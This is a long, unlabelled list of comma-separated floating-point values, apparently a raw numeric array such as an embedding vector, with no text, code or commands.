-0.01337613444775343, 0.007323531433939934, -0.007888388819992542, -0.004177590366452932, 0.02391229197382927, 0.0028105571400374174, 0.004142286721616983, 0.04882877320051193, -0.02612464874982834, -0.015431586652994156, 0.020821265876293182, 0.014937336556613445, -0.016223955899477005, 0.02212357707321644, -0.015564955770969391, 0.013878229074180126, 0.0026634589303284883, 0.01253669336438179, 0.012011062353849411, 0.023174839094281197, 0.010402788408100605, -0.019707242026925087, 0.02286102995276451, 0.010544002056121826, 0.012599455192685127, -0.0034420990850776434, 0.03207134082913399, -0.021888218820095062, -0.008567001670598984, -0.007186239585280418, 0.006252656225115061, -0.025559792295098305, -0.02648553065955639, 0.0016553456662222743, 0.0043031140230596066, 0.006652763579040766, -0.026438457891345024, -0.023520030081272125, 0.01671036146581173, -0.0012415092205628753, 0.024320242926478386, -0.031788911670446396, 0.0035597775131464005, 0.02585791051387787, 0.008818049915134907, 0.028933243826031685, -0.0006496839341707528, 0.01580815762281418, -0.01325060985982418, -0.002010342665016651, 0.0033244204241782427, 0.002779176225885749, 0.0287292692810297, -0.0017838113708421588, -0.009124013595283031, 0.009124013595283031, -0.01653776504099369, 0.009767323732376099, -0.001596506335772574, -0.006083983462303877, -0.005581888370215893, 0.011257919482886791, 0.004660072270780802, -0.012207193300127983, 0.02152733877301216, 0.004648304544389248, 0.0019426775397732854, 0.008567001670598984, 0.005581888370215893, -0.00408736988902092, 0.007766787428408861, -0.011807085946202278, -0.003138096071779728, -0.005205316469073296, 0.02417903020977974, -0.010363562032580376, 0.021919600665569305, 0.012395478785037994, 0.015415896661579609, 0.017714552581310272, -0.01992690935730934, -0.00451101316139102, 0.000016885653167264536, -0.05093129724264145, 0.019864147529006004, -0.00704894820228219, 0.014113586395978928, -0.016302408650517464, 0.006476245354861021, 0.004993495065718889, -0.018169576302170753, -0.010481240227818489, 0.004526703618466854, 0.002885086927562952, 0.007429442368447781, -0.000532495672814548, -0.005130786914378405, -0.009673180989921093, 0.008912192657589912, 0.06037696450948715, 0.03831615298986435, 0.014419551007449627, -0.009139704518020153, 0.014921646565198898, 0.0021947058849036694, 0.0066762990318238735, -0.023865219205617905, 0.012371943332254887, 0.008653299883008003, -0.010112513788044453, -0.005934923887252808, 0.02480664849281311, 0.023802457377314568, 0.009178930893540382, -0.008692526258528233, 0.00029174485825933516, 0.004428638145327568, -0.0037990573327988386, 0.03084748238325119, -0.023771077394485474, 0.00046409497736021876, -0.010567538440227509, 0.000811982317827642, 0.0009399577975273132, 0.006193817127496004, 0.00005172955206944607, 0.0062369657680392265, 0.01382331270724535, 0.03448767587542534, 0.002947848988696933, 0.010175276547670364, 0.01302309799939394, -0.019267909228801727, 0.0078060138039290905, 0.008159049786627293, -0.001652403618209064, 0.007084251847118139, -0.015125622972846031, -0.004055988974869251, -0.002857628744095564, -0.022813957184553146, -0.0069430372677743435, -0.01507070567458868, -0.0037853282410651445, -0.004393334500491619, -0.001652403618209064, -0.0010071326978504658, -0.03646467626094818, -0.01724383793771267, -0.020413314923644066, 0.021715624257922173, -0.01257591973990202, 0.013164312578737736, -0.003026301274076104, 0.03731196001172066, -0.00613105483353138, 0.006856739521026611, -0.006350721698254347, 0.00036602947511710227, -0.02078988589346409, -0.002414372516795993, -0.028572363778948784, 0.0049699596129357815, -0.004495322238653898, -0.007496126927435398, -0.014678443782031536, 0.0064801680855453014, -0.007884466089308262, -0.016223955899477005, 0.012693597935140133, 0.002892932156100869, -0.009547657333314419, -0.01966017112135887, -0.0035970425233244896, -0.003296962007880211, -0.005385756958276033, 0.011665871366858482, 0.00022285385057330132, 0.007190162315964699, -0.0006800842238590121, -0.0008389503345824778, 0.009453513659536839, -0.0012709288857877254, -0.016851576045155525, 0.0042638881132006645, 0.0011120627168565989, -0.0002278797037433833, 0.010512621141970158, -0.01796559989452362, -0.005189626011997461, -0.011210847645998001, -0.00003518099765642546, 0.011406978592276573, -0.013580109924077988, 0.007554966025054455, 0.015494348481297493, -0.0169770997017622, -0.013815467245876789, 0.018514765426516533, -0.009830085560679436, -0.0006898907595314085, -0.005915310699492693, -0.012897574342787266, -0.027442649006843567, -0.003045914461836219, -0.003761792555451393, -0.010371407493948936, -0.00484443549066782, -0.028148720040917397, -0.011461895890533924, -0.007088174112141132, -0.004224661737680435, -0.003081217873841524, 0.013313371688127518, 0.005213161930441856, -0.006652763579040766, -0.019628791138529778, -0.009759478271007538, -0.015258991159498692, 0.014788277447223663, 0.024241792038083076, 0.009453513659536839, -0.02632862515747547, 0.0036578429862856865, 0.015800314024090767, -0.02372400462627411, 0.006029066629707813, 0.021354742348194122, 0.014568610116839409, 0.03119267337024212, 0.017824385315179825, 0.009932073764503002, -0.0017445852281525731, -0.021291980519890785, 0.005628959741443396, 0.00950843095779419, 0.016663288697600365, 0.02453991025686264, -0.006225198041647673, 0.013744859956204891, 0.002135866554453969, 0.0014543113065883517, -0.006060448009520769, 0.011085323989391327, -0.003016494680196047, 0.033922817558050156, 0.011548193171620369, 0.006429173983633518, 0.025716695934534073, 0.0163651704788208, -0.006923424080014229, 0.009006335400044918, 0.0011983603471890092, -0.006797900423407555, -0.004797364119440317, 0.0031184828840196133, 0.010120359249413013, 0.008378716185688972, 0.0022731581702828407, -0.011367752216756344, 0.010018371045589447, -0.008504239842295647, 0.003096908563748002, -0.0011434437474235892, 0.010598919354379177, 0.005817245226353407, -0.0002278797037433833, 0.001786753418855369, -0.010300800204277039, -0.017824385315179825, -0.03455043584108353, -0.02185683883726597, -0.000854640849865973, 0.02330036275088787, 0.015690479427576065, 0.007974686101078987, 0.010018371045589447, 0.022829648107290268, 0.016286717727780342, 0.017039861530065536, 0.0029596167150884867, -0.006421328987926245, 0.012717134319245815, 0.005989840719848871, -0.005440673790872097, 0.021009553223848343, 0.006829281337559223, 0.0069783409126102924, 0.004428638145327568, 0.010143895633518696, -0.006558620370924473, -0.020115194842219353, -0.035240817815065384, 0.0010806818027049303, -0.003618616843596101, -0.008276727981865406, 0.0009041638695634902, 0.00688812043517828, -0.006382102612406015, 0.0209781713783741, 0.024288862943649292, -0.01079505030065775, 0.004099137615412474, -0.005683876108378172, 0.0039873430505394936, 0.003432292491197586, 0.006095751188695431, -0.005303381942212582, -0.0011738439789041877, -0.05086853727698326, 0.011218693107366562, 0.016380861401557922, -0.004059911705553532, 0.0013748783385381103, -0.001232683309353888, -0.0051425546407699585, 0.003955962136387825, 0.009131859056651592, -0.007786400616168976, 0.0023418040946125984, 0.017385052517056465, -0.00870821624994278, -0.004385489039123058, 0.0025340125430375338, 0.025214601308107376, 0.0020162267610430717, -0.004138363990932703, -0.007660876959562302, -0.0003564680810086429, -0.012560228817164898, -0.003430331125855446, -0.007488281466066837, 0.0027536791749298573, -0.005715257488191128, -0.00817473977804184, 0.002024071989580989, -0.004993495065718889, -0.016302408650517464, -0.010512621141970158, 0.00398145942017436, -0.012874038890004158, -0.006295804865658283, 0.016961408779025078, 0.005829013418406248, 0.047699060291051865, 0.014474467374384403, 0.020585909485816956, 0.0014523500576615334, -0.00002831641359080095, 0.006268346682190895, -0.005146477371454239, -0.005699566565454006, 0.002010342665016651, 0.003991265781223774, 0.0236455537378788, 0.03241652995347977, 0.004938578698784113, -0.0002474928041920066, -0.007880543358623981, 0.007362757809460163, -0.006146745290607214, -0.003395027481019497, -0.015015789307653904, 0.0006977360462769866, -0.006750829052180052, 0.011281454935669899, 0.006793977692723274, 0.002857628744095564, 0.008072751574218273, -0.005252388305962086, -0.0005378892528824508, -0.014333253726363182, 0.005789787042886019, -0.0007722657755948603, 0.007252924144268036, 0.002694839844480157, -0.004122673533856869, -0.015298217535018921, 0.014701979234814644, 0.008904347196221352, -0.019346361979842186, -0.02052314765751362, -0.002492825035005808, -0.004589465446770191, -0.010991181246936321, -0.013258455321192741, -0.01436463464051485, -0.011909074150025845, 0.008378716185688972, -0.015784623101353645, 0.03360900655388832, 0.005083715543150902, -0.0189227182418108, 0.0039736139588057995, 0.0009237769991159439, -0.0004263397422619164, -0.003661765716969967, 0.011124550364911556, 0.004307036753743887, 0.006091828923672438, 0.000060616737755481154, 0.013666408136487007, 0.024116266518831253, -0.018452003598213196, 0.005919233430176973, 0.01608274132013321, 0.016569146886467934, -0.0004886113456450403, -0.003614694345742464, -0.006115364376455545, 0.01804405264556408, 0.0100026810541749, 0.0002576670958660543, -0.008496394380927086, 0.015392360277473927, 0.019597409293055534, 0.006083983462303877, -0.0012562189949676394, 0.015800314024090767, -0.0023555331863462925, -0.009877157397568226, 0.030690578743815422, 0.016412241384387016, 0.011414824053645134, 0.0015906223561614752, 0.0029596167150884867, -0.008104132488369942, 0.004597310442477465, 0.02480664849281311, 0.009500585496425629, -0.006495858542621136, 0.01901686191558838, -0.010622454807162285, 0.0010228231549263, -0.0023771077394485474, -0.002410450018942356, 0.022076504305005074, 0.005495590623468161, -0.006017298903316259, 0.0033342270180583, -0.004663995001465082, -0.027678007259964943, 0.012936800718307495, 0.0017328173853456974, -0.024932172149419785, 0.0032342001795768738, 0.012324871495366096, -0.021276291459798813, -0.010873502120375633, 0.014717670157551765, -0.011477585881948471, -0.030643507838249207, 0.01350950263440609, 0.014552920125424862, -0.020334862172603607, 0.008857276290655136, 0.009037716314196587, -0.008143358863890171, 0.0033518788404762745, 0.0007737367996014655, 0.012113050557672977, -0.02078988589346409, 0.0011463856790214777, -0.013485967181622982, 0.008127668872475624, 0.00996345467865467, 0.0009571192786097527, -0.0019367935601621866, 0.00047463702503591776, -0.0019740585703402758, -0.0006879294523969293, -0.013972371816635132, 0.01885995641350746, -0.0013582071987912059, 0.026454148814082146, 0.014019443653523922, 0.015431586652994156, -0.012866193428635597, -0.005931001156568527, 0.007433364633470774, 0.004283500835299492, -0.0037853282410651445, -0.02017795667052269, -0.027897672727704048, -0.010881347581744194, 0.0029027387499809265, -0.000616341654676944, -0.02088402770459652, 0.004110905807465315, 0.012732824310660362, -0.005468131974339485, 0.004114828538149595, -0.018640289083123207, 0.008245347067713737, 0.005020953714847565, 0.011791395954787731, -0.02035055309534073, 0.006688067223876715, 0.001484711654484272, -0.029702078551054, -0.020836956799030304, 0.01653776504099369, 0.0026203100569546223, 0.006060448009520769, -0.012819121591746807, 0.03120836429297924, 0.0011679601157084107, 0.02035055309534073, 0.005762328859418631, 0.016161194071173668, -0.011799240484833717, -0.023535719141364098, -0.01146974042057991, 0.01226210966706276, -0.012356252409517765, -0.01427049096673727, 0.006123209837824106, 0.01627102680504322, 0.00613105483353138, 0.005217084661126137, -0.0011689407983794808, -0.014411705546081066, -0.011093169450759888, 0.016043515875935555, 0.0018475539982318878, 0.015313908457756042, 0.018985480070114136, -0.04277224838733673, 0.03759438917040825, 0.023927981033921242, -0.02008381485939026, 0.014599991030991077, -0.008912192657589912, 0.0046796854585409164, 0.006546852644532919, 0.0065782335586845875, -0.006111441645771265, -0.00001710017204459291, 0.012065978720784187, 0.0100026810541749, 0.010465550236403942, 0.004514935426414013, 0.006958727724850178, -0.007507894653826952, -0.010394942946732044, 0.011493276804685593, 0.0003123386122751981, 0.026344316080212593, -0.010520466603338718, 0.024288862943649292, 0.010787204839289188, -0.0019564067479223013, -0.019581718370318413, 0.005150400102138519, 0.016333788633346558, -0.020507456734776497, -0.002394759561866522, -0.014482312835752964, -0.002996881725266576, 0.004522780887782574, -0.004157977178692818, 0.001099314191378653, 0.00511509645730257, -0.005370066501200199, -0.013650717213749886, -0.004479631781578064, 0.005162167828530073, 0.0027909441851079464, 0.00575840612873435, -0.009932073764503002, 0.0027497566770762205, 0.0017877339851111174, 0.030910246074199677, -0.005468131974339485, -0.012113050557672977, -0.015525729395449162, 0.010865657590329647, 0.017086932435631752, 0.0017406626138836145, -0.0023692625109106302, 0.01226210966706276, -0.005570120178163052, 0.0015513962134718895, 0.0006457613199017942, -0.006629227660596371, -0.00719800777733326, 0.02088402770459652, -0.006558620370924473, 0.000637425750028342, 0.034989770501852036, -0.018436314538121223, -0.004973881877958775, 0.022468766197562218, -0.004930733237415552, 0.012662217020988464, -0.0065037040039896965, -0.019440503790974617, -0.016678979620337486, 0.0051543228328228, -0.0035421259235590696, -0.016961408779025078, -0.014168503694236279, -0.0049111200496554375, -0.0028066346421837807, -0.026689505204558372, -0.019048241898417473, 0.011642335914075375, 0.009539811871945858, 0.023253291845321655, -0.013799777254462242, 0.014474467374384403, 0.01359580084681511, 0.014654908329248428, -0.036150865256786346, -0.013093705289065838, -0.010583228431642056, -0.012881884351372719, 0.01644362322986126, -0.002877241699025035, 0.006895965896546841, -0.004259965382516384, -0.00371079845353961, -0.018075432628393173, 0.0023574945516884327, -0.008770978078246117, -0.012207193300127983, -0.0031282894778996706, 0.0010983336251229048, 0.020476076751947403, 0.007684412412345409, 0.0027144530322402716, 0.012638681568205357, -0.003724527545273304, 0.004714989103376865, -0.005350453779101372, -0.006727293133735657, 0.012646527029573917, -0.01004190742969513, -0.03593119978904724, -0.0072097755037248135, 0.011493276804685593, -0.01590230129659176, 0.006723370403051376, -0.006072215735912323, 0.005248465575277805, 0.0010493008885532618, 0.017369361594319344, 0.0031969351693987846, -0.0021554797422140837, -0.0008497375529259443, -0.005511281080543995, 0.025104768574237823, 0.014121431857347488, -0.015408051200211048, 0.0005388699355535209, 0.0044129472225904465, -0.013360443525016308, -0.021088004112243652, -0.027803530916571617, -0.005962382536381483, 0.005087638273835182, -0.006335031241178513, -0.00435410812497139, -0.006593924015760422, 0.004420792683959007, 0.0038716259878128767, 0.01222288329154253, -0.019424814730882645, -0.002457521390169859, -0.004122673533856869, 0.015800314024090767, 0.02248445712029934, 0.011650181375443935, 0.005899620242416859, -0.022468766197562218, 0.010151740163564682, -0.006574310828000307, -0.007339221891015768, 0.004832667764276266, 0.002198628382757306, -0.0392889603972435, -0.0027615244034677744, -0.015965063124895096, 0.010959800332784653, -0.00008041370892897248, 0.006570388562977314, -0.018153885379433632, -0.001875992980785668, -0.0035911586601287127, -0.01507070567458868, -0.0014650985831394792, 0.01080289576202631, 0.011234383098781109, 0.010206657461822033, -0.002031917218118906, -0.003895161673426628, 0.03508391231298447, -0.003930465318262577, 0.03241652995347977, 0.002561470726504922, 0.0007864853250794113, 0.0064684003591537476, 0.007853085175156593, 0.014239110052585602, 0.0006791035993956029, -0.002751717809587717, -0.01716538518667221, -0.004550239071249962, 0.00902202632278204, -0.0054877451620996, -0.0008325760718435049, 0.0064056385308504105, -0.01507070567458868, -0.008323799818754196, -0.00215744087472558, -0.01619257591664791, 0.01276420522481203, 0.009563347324728966, -0.009139704518020153, 0.019409123808145523, -0.011101014912128448, 0.008253192529082298, -0.0027576019056141376, 0.008888657204806805, 0.00870821624994278, 0.0007055812748149037, 0.012458240613341331, 0.001652403618209064, 0.0029811912681907415, 0.010104669257998466, 0.00451101316139102, -0.0005879026721231639, -0.006484090816229582, -0.011665871366858482, -0.005354376044124365, -0.023221909999847412, 0.04763629660010338, 0.014639217406511307, 0.009288763627409935, -0.01301525253802538, -0.019534647464752197, -0.0009164221119135618, 0.012630836106836796, -0.02356710098683834, 0.012662217020988464, -0.02701900526881218, 0.01306232437491417, 0.03527219966053963, 0.005711334757506847, -0.0056760311126708984, -0.022609980776906013, 0.012819121591746807, -0.025904981419444084, 0.001932870945893228, 0.0029027387499809265, -0.010622454807162285, -0.008967109024524689, -0.01284265797585249, 0.007362757809460163, -0.02008381485939026, 0.011579574085772038, -0.016726050525903702, -0.004185435362160206, 0.025669625028967857, -0.0306748878210783, -0.009971300140023232, 0.024743886664509773, -0.02221771888434887, 0.023221909999847412, 0.010661681182682514, 0.0026713041588664055, -0.006723370403051376, 0.025183219462633133, 0.0025163607206195593, -0.0003839264390990138, -0.00004373108458821662, 0.006958727724850178, -0.004279578570276499, -0.029717769473791122, -0.0031125990208238363, -0.006252656225115061, 0.016223955899477005, 0.002416333882138133, -0.000016042902643675916, -0.0020632981322705746, 0.0037206050474196672, -0.04126596078276634, -0.0011316759046167135, -0.005534816533327103, 0.02008381485939026, -0.0016504423692822456, -0.0007467687828466296, -0.010598919354379177, 0.01725952699780464, -0.0037284502759575844, -0.0022045124787837267, 0.015149158425629139, -0.00726861460134387, -0.004769905935972929, -0.0034009115770459175, -0.005574042908847332, -0.003740218235179782, 0.005993763450533152, -0.0015984675846993923, -0.00942997820675373, -0.000458456197520718, 0.010787204839289188, 0.024226101115345955, 0.008480704389512539, 0.006684144493192434, -0.004809131845831871, 0.0009272092720493674, 0.02570100501179695, -0.008370870724320412, -0.0034832865931093693, -0.022202029824256897, 0.002471250481903553, 0.008245347067713737, -0.0003969201061408967, -0.0035460484214127064, 0.0005869219894520938, -0.0028948935214430094, 0.014780431985855103, -0.0005663282354362309, 0.0077079483307898045, 0.023520030081272125, -0.012348407879471779, -0.001555318827740848, -0.01865598000586033, -0.00919462088495493, -0.0009321125689893961, -0.0029851137660443783, 0.0030282626394182444, 0.00817473977804184, -0.0183107890188694, -0.013148621656000614, -0.009037716314196587, 0.00511509645730257, -0.021009553223848343, 0.003950078506022692, -0.018436314538121223, 0.005366144236177206, -0.002824286464601755, -0.00022297642135526985, -0.007939382456243038, 0.023582791909575462, 0.011603109538555145, 0.009594728238880634, 0.002275119535624981, -0.026454148814082146, -0.010724443010985851, 0.003143979934975505, 0.017118314281105995, -0.002883125562220812, -0.0033636465668678284, -0.008912192657589912, 0.007896234281361103, 0.0012826967285946012, 0.0023418040946125984, 0.002569315955042839, 0.0024908636696636677, -0.01884426549077034, 0.008080597035586834, -0.016302408650517464, 0.01725952699780464, 0.01609843224287033, 0.00731176370754838, -0.01223072875291109, 0.007845239713788033, 0.027411269024014473, 0.004915042780339718, 0.01991121843457222, -0.006994031369686127, -0.00994776375591755, 0.013917455449700356, 0.017353670671582222, -0.008017835207283497, 0.008143358863890171, -0.010520466603338718, -0.007994299754500389, -0.0038637807592749596, 0.021229218691587448, 0.0052406201139092445, 0.0043031140230596066, 0.016569146886467934, 0.00021807315351907164, 0.01848338544368744, 0.020381933078169823, -0.0008732732385396957, -0.011320681311190128, -0.011069633066654205, 0.021480266004800797, -0.0009517256403341889, -0.006570388562977314, -0.001841670018620789, 0.016694670543074608, 0.005217084661126137, 0.019973980262875557, 0.011634490452706814, -0.0012209154665470123, -0.0091553945094347, -0.006758674047887325, -0.014450931921601295, 0.005703489296138287, -0.0036715723108500242, 0.0036539204884320498, 0.01688295602798462, -0.02053883858025074, -0.01777731440961361, 0.013886074535548687, -0.012826967053115368, -0.01911100372672081, -0.0016141581581905484, 0.008480704389512539, 0.007347067352384329, -0.0016543649835512042, -0.0006227159174159169, -0.017447814345359802, 0.01480396743863821, -0.0008203178877010942, -0.024163339287042618, 0.013886074535548687, -0.005036644171923399, 0.012481776997447014, 0.017479194328188896, 0.018954100087285042, -0.007296073250472546, -0.0051660905592143536, 0.012991717085242271, -0.0045463163405656815, -0.008920038118958473, 0.013697789050638676, 0.011791395954787731, -0.0433998666703701, 0.006464477628469467, -0.02002105303108692, 0.003789250971749425, 0.003485247725620866, 0.005130786914378405, 0.010598919354379177, 0.0032655810937285423, -0.008582692593336105, -0.01867167092859745, -0.006484090816229582, 0.013305527158081532, -0.006209507584571838, 0.01821664720773697, -0.013619336299598217, -0.004083447158336639, 0.02160579152405262, -0.016027824953198433, 0.026156030595302582, -0.013540884479880333, -0.005711334757506847, 0.0076726446859538555, 0.012968181632459164, -0.01298387162387371, 0.008857276290655136, -0.009445669129490852, -0.029137220233678818, 0.02301793359220028, 0.042615342885255814, 0.010912728495895863, 0.0001596015936229378, -0.025120457634329796, -0.011187312193214893, -0.020570218563079834, -0.020821265876293182, 0.002892932156100869, 0.007825626991689205, 0.017385052517056465, -0.01617688499391079, -0.005311227403581142, -0.003804941428825259, 0.000672238995321095, 0.010340026579797268, 0.020695742219686508, 0.004930733237415552, 0.016945717856287956, -0.011116704903542995, 0.014082205481827259, 0.023347433656454086, -0.0240064337849617, 0.010434169322252274, 0.012379788793623447, -0.013682098127901554, 0.018561838194727898, -0.003032185137271881, 0.010810740292072296, 0.015541420318186283, -0.008810204453766346, 0.008535620756447315, -0.010143895633518696, -0.021229218691587448, 0.01404297910630703, 0.006350721698254347, 0.0010777398711070418, 0.01177570503205061, 0.007864853367209435, 0.005413215607404709, 0.004813054576516151, 0.006531162187457085, -0.0008208082290366292, 0.004687530919909477, -0.0023025779519230127, -0.040858007967472076, 0.020429003983736038, -0.010857812128961086, -0.0034205245319753885, -0.0028458607848733664, -0.0028027119114995003, 0.030031578615307808, -0.020601600408554077, 0.012097359634935856, -0.020319171249866486, -0.006758674047887325, -0.01875012367963791, 0.011862002313137054, 0.011430514976382256, 0.0007614786154590547, 0.009908538311719894, 0.011210847645998001, -0.002288848627358675, 0.01964448019862175, 0.01591799221932888, -0.01199537143111229, -0.001623964635655284, -0.017306599766016006, -0.0033165751956403255, 0.012889728881418705, -0.031067149713635445, 0.018373552709817886, 0.006699834950268269, -0.012481776997447014, 0.008472858928143978, -0.01619257591664791, 0.016773123294115067, -0.0020221106242388487, -0.00795115064829588, 0.01859321817755699, 0.00715878140181303, 0.004350185394287109, -0.009124013595283031, -0.01787145622074604, -0.0004964565741829574, -0.0103086456656456, 0.008339489810168743, -0.005322995129972696, -0.007135245483368635, 0.012850502505898476, -0.026877792552113533, 0.012905419804155827, 0.001407239935360849, -0.00893572811037302, -0.020146576687693596, 0.0061742039397358894, 0.009539811871945858, 0.004063834436237812, -0.008166894316673279, 0.00269091734662652, 0.012944646179676056, -0.014388170093297958, -0.013446740806102753, 0.0004488948325160891, 0.023943671956658363, 0.017008479684591293, -0.0064801680855453014, -0.0022653129417449236, -0.010088978335261345, -0.005934923887252808, 0.007190162315964699, 0.005260233301669359, 0.003895161673426628, -0.02505769580602646, 0.013956681825220585, -0.014168503694236279, 0.010316490195691586, -0.011587419547140598, -0.00666453130543232, -0.0008732732385396957, -0.035334959626197815, -0.0010698946425691247, 0.007456900551915169, 0.003495054319500923, -0.01857752725481987, 0.011124550364911556, -0.006284037139266729, -0.0037637539207935333, -0.010112513788044453, -0.005919233430176973, -0.0007237233803607523, -0.023802457377314568, 0.0031361347064375877, 0.009673180989921093, 0.00023621527361683547, 0.015227610245347023, -0.011265764944255352, 0.010018371045589447, 0.015039324760437012, -0.008417942561209202, 0.002675226889550686, -0.002177054062485695, 0.02996881678700447, -0.023629862815141678, 0.012544538825750351, -0.004860125947743654, -0.018781503662467003, -0.007327454164624214, -0.01760471798479557, -0.02046038582921028, -0.0009355448419228196, -0.006166358478367329, -0.010520466603338718, -0.005844703875482082, -0.004252119921147823, 0.0072843050584197044, 0.01205028872936964, 0.021103695034980774, -0.008029603399336338, 0.0009051445522345603, -0.011712943203747272, -0.006068293005228043, 0.004687530919909477, -0.0010061520151793957, 0.005389679688960314, -0.0013405553763732314, 0.005440673790872097, 0.0044717867858707905, -0.01173647865653038, 0.0035185900051146746, -0.011862002313137054, 0.015988599509000778, -0.009359370917081833, -0.029545173048973083, 0.009830085560679436, 0.014490158297121525, 0.006389948073774576, -0.014764741063117981, 0.023253291845321655, 0.009979145601391792, -0.02408488653600216, 0.002239815890789032, -0.01427049096673727, -0.0033283429220318794, -0.005719179753214121, 0.0035480097867548466, -0.015204074792563915, 0.006323263514786959, -0.004565929528325796, -0.002129982691258192, -0.016835885122418404, -0.0029360810294747353, 0.010426323860883713, 0.005962382536381483, 0.01125007402151823, -0.002345726825296879, 0.008637608960270882, -0.016726050525903702, -0.0039736139588057995, -0.011791395954787731, 0.01103040762245655, 0.0018799155950546265, -0.0019779810681939125, 0.00034224858973175287, 0.008692526258528233, 0.007841316983103752, 0.019613100215792656, 0.004036375787109137, 0.019048241898417473, 0.0003040030424017459, -0.018295099958777428, 0.00526415603235364, 0.008410097099840641, -0.006189894396811724, 0.026156030595302582, 0.00892788264900446, 0.0019318903796374798, -0.0051425546407699585, -0.013815467245876789, 0.004632614087313414, -0.0052406201139092445, -0.02053883858025074, -0.026799339801073074, 0.010857812128961086, -0.01955033838748932, 0.007331376895308495, -0.009492740035057068, 0.01172863319516182, -0.013752705417573452, -0.02002105303108692, 0.016318099573254585, -0.00012252057786099613, 0.026626743376255035, -0.012622990645468235, 0.020068123936653137, 0.00753535283729434, 0.02524598129093647, 0.011830621398985386, 0.0009683967800810933, 0.005209239199757576, 0.016757432371377945, 0.0015778738306835294, -0.009398597292602062, -0.022013742476701736, 0.007488281466066837, 0.014450931921601295, 0.013438896276056767, 0.0009826163295656443, 0.007260769605636597, 0.010693062096834183, -0.022453077137470245, 0.008818049915134907, 0.008457168936729431, 0.015863075852394104, 0.0064684003591537476, 0.000018356635337113403, -0.0024692893493920565, 0.003634307300671935, -0.008865120820701122, -0.01619257591664791, 0.0025771614164114, 0.0011032368056476116, 0.02692486345767975, -0.001532763708382845, 0.02960793487727642, 0.009908538311719894, -0.014246955513954163, 0.0033146138302981853, -0.004299191292375326, 0.007943305186927319, -0.009845776483416557, 0.006994031369686127, 0.001540608936920762, 0.005672108381986618, 0.017290908843278885, -0.0013640910619869828, -0.010897038504481316, 0.01018312107771635, 0.018969789147377014, 0.004075602162629366, 0.01257591973990202, 0.02008381485939026, -0.020052433013916016, -0.0031557476613670588, 0.004950346425175667, 0.023755386471748352, -0.0014052785700187087, -0.00045551423681899905, -0.003899084171280265, -0.00902202632278204, 0.014254800975322723, 0.0441216304898262, -0.015031479299068451, -0.0020201492588967085, -0.008770978078246117, 0.007500049192458391, -0.03370315209031105, -0.03386005386710167, 0.038975153118371964, 0.0030066880863159895, 0.01022234745323658, -0.0010041906498372555, -0.0016690747579559684, 0.016475003212690353, 0.005762328859418631, 0.006374257616698742, 0.0026771880220621824, 0.018954100087285042, -0.0014111625496298075, 0.005997685715556145, -0.004883661866188049, 0.00650762626901269, -0.020758504047989845, 0.017212456092238426, 0.0013199616223573685, -0.0032165483571588993, 0.0018956060521304607, 0.0011385404504835606, -0.013846848160028458, -0.02046038582921028, 0.002912545343860984, 0.02126060053706169, 0.020381933078169823, -0.006440942175686359, -0.01608274132013321, -0.022986553609371185, 0.00946920458227396, 0.00225550658069551, -0.01106178853660822, 0.004542394075542688, 0.01565909944474697, -0.023190530017018318, -0.0066684540361166, -0.007892311550676823, -0.0017122236313298345, 0.0007041103090159595, -0.007884466089308262, -0.007558888755738735, -0.019440503790974617, -0.010897038504481316, 0.011814931407570839, -0.008057061582803726, 0.017934218049049377, 0.016522075980901718, 0.0183107890188694, -0.0006379160913638771, 0.015227610245347023, -0.013642871752381325, 0.009641800075769424, 0.008088442496955395, -0.02232755348086357, 0.015941526740789413, 0.018012670800089836, -0.00526807876303792, 0.02648553065955639, 0.01489026565104723, 0.009759478271007538, 0.006036912091076374, 0.004059911705553532, 0.007221543230116367, 0.016255337744951248, 0.015776777639985085, -0.009892847388982773, 0.0036499977577477694, -0.0069077336229383945, -0.0183107890188694, 0.008213966153562069, 0.0047032213769853115, -0.007790323346853256, 0.006378179881721735, 0.003353839972987771, 0.025089077651500702, -0.014639217406511307, -0.001224838080815971, 0.022704124450683594, 0.005079792812466621, -0.018106814473867416, -0.01741643249988556, 0.005993763450533152, -0.005170013289898634, -0.0023339588660746813, -0.004248197190463543, -0.026281554251909256, -0.025638243183493614, -0.00458161998540163, 0.02585791051387787, 0.0010875463485717773, -0.000051790841098409146, 0.007190162315964699, 0.004860125947743654, -0.02399074286222458, 0.0017132043140009046, -0.0017808694392442703, 0.034895628690719604, 0.016584837809205055, -0.009673180989921093, 0.026909172534942627, -0.010088978335261345, 0.010630300268530846, 0.024398695677518845, 0.0025830452796071768, -0.014168503694236279, -0.0020123040303587914, -0.004522780887782574, -0.0005496570956893265, -0.010159585624933243, 0.0031733994837850332, 0.00791584700345993, -0.048577725887298584, -0.0072725373320281506, -0.0004974372568540275, 0.02587360143661499, 0.01912669464945793, 0.007884466089308262, 0.011658026836812496, 0.0027046464383602142, -0.018781503662467003, -0.005362221505492926, 0.007943305186927319, -0.01103040762245655, -0.02151164785027504, -0.000553579768165946, -0.006107519380748272, 0.020429003983736038, 0.0035833134315907955, 0.057207487523555756, 0.012685752473771572, 0.01044985931366682, -0.01129714585840702, -0.0050444891676306725, 0.012834812514483929, -0.013611490838229656, -0.009131859056651592, -0.00902202632278204, 0.031600628048181534, -0.0037872896064072847, -0.008551311679184437, 0.013274146243929863, -0.01751057617366314, 0.0049699596129357815, 0.003753947326913476, -0.012913265265524387, 0.00011363339581293985, 0.0006756712682545185, -0.01329768169671297, -0.00522100692614913, 0.0015935644041746855, 0.012097359634935856, 0.0010169391753152013, 0.009979145601391792, 0.003440137719735503, 0.010057597421109676, -0.004950346425175667, 0.007401983719319105, -0.04487477242946625, 0.021025242283940315, -0.008582692593336105, 0.008590538054704666, 0.017761623486876488, 0.007625573314726353, -0.0004084428073838353, 0.003436214989051223, 0.019048241898417473, 0.004977804608643055, -0.023065004497766495, 0.003804941428825259, -0.010112513788044453, -0.0024182952474802732, -0.005138631910085678, -0.004003033507615328, -0.005825090687721968, -0.00016548552957829088, -0.017275217920541763, 0.016726050525903702, -0.012379788793623447, -0.006350721698254347, 0.009257382713258266, 0.0005942769348621368, 0.004095215350389481, -0.007319608703255653, -0.024163339287042618, -0.0032753876876085997, -0.0050680250860750675, -0.022923791781067848, -0.002443792298436165, -0.003775521647185087, -0.014568610116839409, -0.005778019316494465, 0.0006335031357593834, -0.010190966539084911, -0.0015641447389498353, 0.020303480327129364, 0.007860930636525154, -0.00462084636092186, 0.0094613591209054, 0.0002527638280298561, -0.0059466916136443615, 0.005597578827291727, -0.019879838451743126, -0.006629227660596371, -0.001806366490200162, 0.015627717599272728, 0.01001052651554346, -0.006495858542621136, -0.012395478785037994, 0.011093169450759888, -0.01600428856909275, 0.008057061582803726, -0.0077471742406487465, -0.0016975137405097485, -0.0015582607593387365, 